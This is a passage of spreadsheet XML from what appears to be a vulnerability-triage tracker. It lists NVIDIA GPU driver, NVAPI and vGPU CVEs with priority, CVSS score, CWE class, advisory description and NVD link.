          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where a user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47551</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47552</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could bypass an authorization check and modify privileged configuration. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47552</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47553</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47553</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47556</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause an integer overflow that leads to an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47556</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47558</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a double-free of imported memory state. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47558</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47559</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could access memory belonging to another user's process. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47559</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47560</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47560</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47561</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where the size of an ioctl input buffer is not validated, allowing an unprivileged caller to trigger an out-of-bounds write in kernel memory. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47561</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47563</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47563</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47569</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause a type confusion via a handle recycle race. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47569</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47570</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the CUDA driver where an attacker could cause a library to be loaded from an uncontrolled search path. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47570</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47571</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in kernel-mode escape handling where an attacker with local access could bypass an authorization check that is intended to restrict certain operations based on client execution context. A successful exploit of this vulnerability might lead to escalation of privilege, information disclosure, data tampering, denial of service, or code execution.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47571</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47572</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause type confusion. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47572</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47573</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>NVIDIA NVAPI for Windows contains a vulnerability where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47573</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47574</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability where an attacker could cause incorrect resource transfer between spheres. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47574</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47575</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the display driver DIAG escape handler where a local unprivileged attacker may cause an integer overflow and out-of-bounds write. A successful exploit of this vulnerability might lead to denial of service, and code execution.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47575</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47577</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause an incorrect comparison. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47577</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47578</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
